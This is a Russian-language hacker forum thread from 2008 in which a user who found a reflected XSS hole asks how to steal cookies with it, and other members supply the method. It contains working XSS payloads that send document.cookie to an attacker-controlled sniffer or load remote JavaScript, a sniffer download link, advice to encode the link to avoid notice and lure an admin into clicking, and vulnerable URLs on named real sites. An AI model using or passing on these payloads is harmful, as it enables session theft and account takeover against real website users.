Пассивная ХСС

Discussion in 'Песочница' started by Arigona, 12 Dec 2008.

  1. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Здравствуйте. Вот нашёл на 1 сайте пассивную хсс ( /open.php?url='><script>alert(/xak/)</script> )

    1 Вопрос, что можно сделать имея её? Возможно как-то украсть куки, и что-то вроде?

    Заранее спасибо за ваши ответы.
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Дать тому, у кого хочешь свистнуть куки, такую ссылку:

    /open.php?url='<script>window.location.href='http://твой_сайт/s.php?'+document.cookie;</script>

    где s.php - твой снифер
     
  3. [Dezzter]

    [Dezzter] Elder - Старейшина

    Joined:
    26 Nov 2007
    Messages:
    182
    Likes Received:
    131
    Reputations:
    3
    мда, почитай статьи по xss и вопросы пропадут сами собой, всё просто, любой поймёт
     
  4. preda1or

    preda1or Member

    Joined:
    27 Oct 2008
    Messages:
    167
    Likes Received:
    96
    Reputations:
    6
    вот тебе мой снифер, может отправлять на почту, а может писать в файл. определяет некоторую инфу о юзере.
    http://depositfiles.com/files/d3gf1m5m9

    p.s. лучше написать свой ява скрипт, и залить на свой сервер с снифером, ссылка будет лучше
    /open.php?url='<script src='http://www.blabla.ru/a.js'></script>
     
    #4 preda1or, 12 Dec 2008
    Last edited: 12 Dec 2008
  5. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Просто видел у 1 человек нашёл пассивный хсс, и написал снифер вроде, и поставил его на хостинг, и когда заходиш на сайт http://тут его сайт.narod.ru то куки воруются у того сайта с пассивной хссшкой.
     
  6. +BemepoK+

    +BemepoK+ Member

    Joined:
    6 Dec 2008
    Messages:
    27
    Likes Received:
    11
    Reputations:
    -2
    Возможно при условии, что юзер (админ) окажется лохом и кликнет по ссылке, которую ты ему пришлешь. Только ссылку, которую тебе дал Pashkela запиши в hex или криптани, а то так палевно слишком.
    Это либо активка была
     
    #6 +BemepoK+, 12 Dec 2008
    Last edited: 12 Dec 2008
  7. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Вот есть просто на сайте хсс пассивная вроде, http://freetmd.net/redir.php?url='><script>alert(/xak/)</script>

    Как тут куки своровать?( Просто тестировал над собой, и куки не присылалисЬ, присылалась только инфа а куки нет.
     
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Что значит "как"? Посты в теме читал вообще?
     
  9. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Pashkela, читал. Прочитай мой последний пост '' повнимательней '' пожалуйста.
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    "Просто тестировал над собой"

    и что? Это должно мне о чем-то сказать? Например о том, что ты вообще понятие имеешь что такое снифер? И умеешь им ПРАВИЛЬНО пользоваться?

    Вот правильный снифер, которым, например, пользуюсь давно уже:

    Скачать снифер
     
  11. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Спасибо. Помог. Это типо нужно использовать так:

    /open.php?url='<script src='http://мой сайт/снифер/s.gif'></script>

    дык правильно?
     
  12. BuG_4F

    BuG_4F Member

    Joined:
    20 May 2008
    Messages:
    88
    Likes Received:
    67
    Reputations:
    5
    http://www.mobile-warez.ru/redir.php?url='><script>alert(/xak/)</script>
    Аналогичная хрень :)
     
  13. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    BuG_4F, согласен) Просто учусь :) Вот и попросил помочь, если уж что кривое спросил вы меня простите :)
     
  14. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Нет, неправильно. Читай МОИ посты в этой теме. Остальные требуют уже некого понимания сути XSS и навыков
     
  15. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    /open.php?url='<script>window.location.href='http://твой_сайт/s.gif?'+document.cookie;</script>

    так значит?)
     
  16. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Маладес
     
  17. Arigona

    Arigona Banned

    Joined:
    9 Dec 2008
    Messages:
    99
    Likes Received:
    22
    Reputations:
    -5
    Спасибо, работает. Тему плз клосед :) Если что найду интересное поделюсь в халяве :)